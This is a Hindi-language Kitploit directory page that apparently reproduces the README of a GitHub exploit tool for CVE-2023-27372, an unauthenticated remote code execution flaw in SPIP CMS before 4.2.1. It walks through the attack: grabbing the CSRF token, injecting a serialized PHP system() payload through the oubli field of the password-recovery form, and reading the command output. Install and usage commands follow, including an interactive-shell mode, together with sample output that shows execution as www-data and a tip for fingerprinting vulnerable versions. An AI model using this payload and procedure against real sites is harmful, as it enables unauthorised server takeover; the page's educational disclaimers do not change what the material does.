Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-27372 — CVE-2023-27372 के लिए इंटरैक्टिव शेल के साथ एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/scriniariii/cve-2023-27372
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubscriniariii/cve-2023-27372

CVE-2023-27372

CVE-2023-27372 के लिए इंटरैक्टिव शेल के साथ एक्सप्लॉइट

रिपॉजिटरी देखें
15 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-27372 एक्सप्लॉइट

CVE-2023-27372 के लिए एक्सप्लॉइट, SPIP CMS में एक बिना प्रमाणीकरण वाली रिमोट कोड एक्ज़ीक्यूशन (Remote Code Execution) भेद्यता, जो 4.2.1 से पहले के संस्करणों को प्रभावित करती है।

⚠️ केवल शैक्षिक उद्देश्यों के लिए। केवल उन सिस्टमों पर उपयोग करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। अनधिकृत उपयोग अवैध है।


अवलोकन

SPIP एक ओपन-सोर्स CMS है जिसका व्यापक रूप से वेब प्रकाशन के लिए उपयोग किया जाता है। यह भेद्यता पासवर्ड पुनर्प्राप्ति फ़ॉर्म (/spip.php?page=spip_pass) में मौजूद है, जहाँ oubli पैरामीटर को उचित सैनिटाइज़ेशन के बिना संसाधित किया जाता है, जिससे हमलावर सर्वर पर मनमाना PHP कोड इंजेक्ट और निष्पादित कर सकता है — बिना किसी प्रमाणीकरण की आवश्यकता के।

फ़ील्डविवरण
CVECVE-2023-27372
CVSS स्कोर9.8 (क्रिटिकल)
हमला वेक्टरनेटवर्क
प्रमाणीकरणकोई आवश्यक नहीं
प्रभावित संस्करणSPIP < 4.2.1
भेद्यता प्रकारकोड इंजेक्शन / बिना प्रमाणीकरण वाला RCE

यह कैसे काम करता है

  1. CSRF टोकन प्राप्त करें — HTML फ़ॉर्म से formulaire_action_args टोकन निकालने के लिए /spip.php?page=spip_pass पर GET अनुरोध भेजा जाता है।

  2. पेलोड बनाएँ — निष्पादित की जाने वाली कमांड के साथ एक PHP सीरियलाइज़्ड स्ट्रिंग तैयार की जाती है:

    root@kitploit:~
    s:N:"<?php system('COMMAND'); ?>";
    

    जहाँ N आंतरिक PHP स्ट्रिंग की सटीक बाइट लंबाई है।

  3. पेलोड भेजें — CSRF टोकन के साथ oubli फ़ील्ड में तैयार पेलोड के साथ POST अनुरोध भेजा जाता है। SPIP इस फ़ील्ड को बिना सैनिटाइज़ेशन के संसाधित करता है और इंजेक्ट किए गए PHP कोड को निष्पादित करता है।

  4. आउटपुट निकालें — कमांड आउटपुट HTML प्रतिक्रिया के अंदर लौटाया जाता है और oubli इनपुट फ़ील्ड के value एट्रिब्यूट से पार्स किया जाता है।

आवश्यकताएँ

  • Python 3.x
  • requests
  • beautifulsoup4
  • argparse
  • regex

इंस्टॉलेशन

root@kitploit:~

git clone https://github.com/scriniarii/CVE-2023-27372

cd CVE-2023-27372

pip install requests beautifulsoup4

उपयोग

root@kitploit:~
python3 exploit.py -u <URL> -c <command>
तर्कविवरण
-u, --urlलक्ष्य SPIP इंस्टेंस का बेस URL
-c, --commandलक्ष्य पर निष्पादित की जाने वाली OS कमांड
-s, --shellइंटरैक्टिव शेल

उदाहरण

root@kitploit:~

python3 exploit.py -u http://TARGET/ -c "id"
root@kitploit:~

python3 exploit.py -u http://TARGET/ -s

अपेक्षित आउटपुट:

root@kitploit:~
[+] Token found : JWDCxt5PTFzhPb...
 
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

प्रभावित संस्करण

किसी लक्ष्य का SPIP संस्करण जाँचने के लिए, HTML में मेटा जनरेटर टैग देखें:

root@kitploit:~
<meta name="generator" content="SPIP 4.2.0" />

[!CAUTION]
⚠️ अस्वीकरण
कृपया मेरे रिपॉज़िटरी में दी गई जानकारी और एक्सप्लॉइट का उपयोग केवल शैक्षिक उद्देश्यों और जिम्मेदार प्रकटीकरण के लिए करें। इन टूल, स्क्रिप्ट या एक्सप्लॉइट के दुरुपयोग या क्षति के लिए मैं जिम्मेदार नहीं हूँ।

टूल डाउनलोड करें